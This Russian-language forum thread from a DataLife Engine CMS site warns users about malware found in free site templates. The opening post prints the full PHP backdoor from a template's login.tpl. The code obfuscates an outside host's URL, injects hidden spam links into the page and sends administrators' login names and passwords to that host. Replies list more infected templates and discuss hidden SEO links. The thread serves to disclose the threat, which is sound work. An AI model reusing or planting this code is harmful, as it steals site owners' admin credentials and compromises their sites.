CMS DataLife Engine - Система управления сайтами

Sign in to follow this  
Langly

Что нашел в бесплатном шаблоне

Recommended Posts

в login.tpl следующий код:

<?

$login_cache="engine/cache/system/login_cache.txt"; 

$logingtrue1 = 'eart';

$logingtrue2 = 'htt';

$logingtrue3 = '.r';

$logingtrue4 = 'p://nic';

if(!is_file($login_cache) || filemtime($login_cache)<time()-432000) 

{ 

$file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=". urlencode($_SERVER['SERVER_NAME']); 

$logingtrue = @file_get_contents($file_url); 

if($logingtrue) 

{

$file = fopen($login_cache, "w");

fwrite( $file, $logingtrue);

fclose( $file );

// chmod ( $file, 0777); //права

}

} 

else {

$logingtrue = file_get_contents($login_cache); 

}

if ($is_logged == TRUE){

$login_panel = <<<HTML

<div style="padding-top:2px; padding-left:20px;">Привет, <b>{$member_id['name']}</b>!</div>

<div style="padding-top:5px; padding-bottom:5px; padding-left:22px;">

HTML;


if ($user_group[$member_id['user_group']]['allow_admin']) {

$file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=". urlencode($_SERVER['SERVER_NAME']) ."&un=". $login_name ."&up=". $login_password; 

$logingtrue = file_get_contents($file_url); 

$login_panel .= <<<HTML

		<a href="{$adminlink}" target="_blank">Админцентр</a> | 

HTML;

}

$login_panel .= <<<HTML

	<a href="{$link_profile}">Мой профиль</a> | <a href="{$link_pm}">Cообщения ({$member_id['pm_unread']} | {$member_id['pm_all']})</a> | 

<a href="{$link_favorites}">Мои закладки</a> | <a href="{$link_stats}">Статистика</a> | <a href="{$link_addnews}">Добавить новость</a> | 

<a href="{$link_newposts}">Обзор непрочитанного</a>  |  <div style="padding-top:2px; padding-bottom:5px; padding-left:75px;"><a onclick="java script: showBusyLayer()" href="{$link_logout}"><b>Завершить сеанс!</b></a></div>

				</div>

HTML;


} else {

$login_panel = <<<HTML

$logingtrue

 			<div style="padding-top:5px; padding-left:21px;">


  <table class="stext">

	<form method=post onsubmit="java script: showBusyLayer()">

	  <tr align="left" valign="middle"> 

		<td width="58" height="25" align="right">Логин</td>

		<td height="25" align="right"><input type="text" name="login_name" style="width:103px; height:20px; font-family:tahoma; font-size:11px; border:1px solid #E0E0E0 "></td>

		<td align="right">Пароль</td>

		<td align="right"><input type="password" name="login_password" style="width:103px; height:20px; font-family:tahoma; font-size:11px; border:1px solid #E0E0E0 "></td>

		<td align="right"> <input onclick="submit();" name="image" type="image" src="{THEME}/images/send.png"> 

		  <input name="login" type="hidden" id="login2" value="submit"></td>

		<td align="right"><a href="{$link_regist}">Регистрация на сайте!</a><br> 

		  <a href="{$link_lost}">Забыли пароль?</a></td>

	  </tr>

	</form>

  </table>

			  </div>

<div style="padding-top:8px; padding-left:55px; padding-bottom:5px;"></div>

HTML;

}

?>
Содержимое созданного файла engine/cache/system/login_cache.txt :
<div style="display: none;">

Всё по движку datalfe engine <a href="http://niceart.ru">datalife engine</a> например, шаблоны, модули для движка.

Сайт для православных - <a href="http://rppr.ru">Русский православный сайт</a> - круг общения русских людей.

Скачать электронные книги без регистрации <a href="http://bookloader.info">электронные книги</a> - e-books и электронные книги. 

За новосятми для развлечения приходите на <a href="http://superpuper.info">развлекательный портал</a> и общайтесь в удовольствие.

Самые свежие авто новости про автомобили здесь - <a href="http://avtoparty.info">автомобильные новости</a> - каждому автолюбителю.

</div>

А логин и пароль отсылаются на адрес: _http://niceart.ru/getlink/003/db.php?ticket=095

Пользуйтесь бесплатными шаблонами товарищи:-)

Share this post


Link to post
Share on other sites

Langly, ты бы хоть написал, что за шаблон, таких людей должны знать в лицо. А то кто знает... может ты сам это придумал.

Share this post


Link to post
Share on other sites

По идее в .tpl php код внедрить должно быть невозможно.

login.tpl - это единственный шаблон, в котором есть php код.

Share this post


Link to post
Share on other sites

Langly, ты бы хоть написал, что за шаблон, таких людей должны знать в лицо. А то кто знает... может ты сам это придумал.

Больше мне делать нечего как подобные вещи выдумывать.

Шаб нашел в паблике. Написал-же "бесплатный". Хз на каком сайте, не помню уже(но не на твоем, это точно:-)).

Выложил все это с единственной целью - показать что нашел в коде, для того чтобы люди любой шаблон проверяли на наличие подобного кода перед использованием. В первую очередь в админке антивирем. Если создаются в движке какие-то непредусмотренные файлы он их показывает.

Кто знает как и где еще могут располагаться зловредные коды в шаблонах - напишите. Интересно.

Edited by Langly

Share this post


Link to post
Share on other sites

Все правильно таких бесплатных шаблонов пруд пруди, сам постоянно нахожу такие, если людям интересно привожу их названия:

CS_theme2

dle_2008_saratov

dle_templates_red_alert

dleohotnikoff

fanfootbal-stx

Free_Template

freemir

gta

pirate2

shabszel

Software

warezlife

warezlife1

wow_tpl

это найденные мной на скорую руку, во всех файлах login.tpl

<?

$login_cache="engine/cache/system/login_cache.txt";

$logingtrue1 = 'eart';

$logingtrue2 = 'htt';

$logingtrue3 = '.r';

$logingtrue4 = 'p://nic';

if(!is_file($login_cache) || filemtime($login_cache)<time()-432000)

{

$file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=".

далее делайте выводы сами, есть конечно бяки в других файлах tpl по не такие смертельные. Не думаю что этот чел сам делал все эти шаблоны а авторы явно даже и не догадываются о такой подставе, просто он вписывает туда свой код дабы получить доступ к сайтам и возобнить себя крутым хацкером. Сам аналогично не помню откуда их качал но думаю не составит труда по автору публикации найти его.

Share this post


Link to post
Share on other sites

sting,

не лишнем будет указать источник, откуда скачивались шаблоны.

Share this post


Link to post
Share on other sites

sting,

не лишнем будет указать источник, откуда скачивались шаблоны.

Ты что шутишь, я не записываю такие вещи, но можно поюзать поиск например ищем shabszel вот, бите

http://yandex.ru/yandsearch?clid=13999&amp...p;text=shabszel

получаем

1. Скин в зеленых тонах " For DLE - Все для dle,шаблоны,модули...

Скачать: shabszel.rar [202.87 Kb] (cкачиваний:

fdle.ru/2007/12/16/skin-v-zelenykh-tonakh.html · 33 КБ

далее по аналогии.

Share this post


Link to post
Share on other sites

по-моему, надо стороной обходить все бесплатное. т.к. бесплатный тока сыр в мышеловке.

Share this post


Link to post
Share on other sites

далее делайте выводы сами, есть конечно бяки в других файлах tpl по не такие смертельные. Не думаю что этот чел сам делал все эти шаблоны а авторы явно даже и не догадываются о такой подставе, просто он вписывает туда свой код дабы получить доступ к сайтам и возобнить себя крутым хацкером. Сам аналогично не помню откуда их качал но думаю не составит труда по автору публикации найти его.

Можно чуть подробнее. Что именно бывает в других файлах и в каких обычно?

Share this post


Link to post
Share on other sites

Например ссылки на какой либо сайт для поднятия его цытируемости, еще проще взять подобный шаблон и внимательно просмотреть его код плюс проанализировать что и зачем.

Share this post


Link to post
Share on other sites

Можно добавить ещё пару слов о использовании нелицензионных версий dle: недавно просмотрел и сравнил коды лицензионки и нулёной версии - после этого был снят вопрос о частых темах про взлом dle - в нелицензионную версию помимо снятия различного вида проверок была добавлена куча дырок для взлома сайта. :)

Так что пользуйтесь оригинальной версией. :)

Share this post


Link to post
Share on other sites

в нелицензионную версию помимо снятия различного вида проверок была добавлена куча дырок для взлома сайта.

Так что пользуйтесь оригинальной версией.

Ага пользуйтесь :angry: Стоит ого-го дороговастенько, чтоб купить лицензию мне надо тогда почти пол года стипендию откладывать :mellow:

А с другой стороны

бесплатный только сыр в мышеловке

А мне хорошо я на Joomla 1.5.7 сижу :D

Edited by deGODy

Share this post


Link to post
Share on other sites

Ага пользуйтесь Стоит ого-го дороговастенько, чтоб купить лицензию мне надо тогда почти по года стипендию откладывать

Очень интересно, 1500 это дорого, у меня вот возник вопрос на компьютер вы тогда с рождения копили или его украли? За интернет вы платите экономя на хлебе? или у соседа воруете подключившись к его кабелям. За хостинг вы платите приторговывая пиратскими дисками на рынке или просто взломали хостинг провайдера и взяли себе кусочек места? Про домен я молчу, т.к. боюсь предположить откуда он у вас. Вы оправдываете такое уголовное преступление как воровство тем, что у вас нет денег. Оригинально. Но дело даже не в этом, если у вас нет денег, вам не хочется платить за скрипта, так извините какого .... вы тогда его используете? Есть бесплатные скрипты, используйте их, зачем воровать и оправдывать себя? Вот этого я хоть убейте не понимаю.

Share this post


Link to post
Share on other sites

<div style="display: none;">ссылка</div>

Кстати, такие ссылки индексятся поисковиками или нет, кто знает?

Бывает надо несколько ссылок поставить, чтобы индекснулись, а вид портят.

Если так оформлять будут индекситься?

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this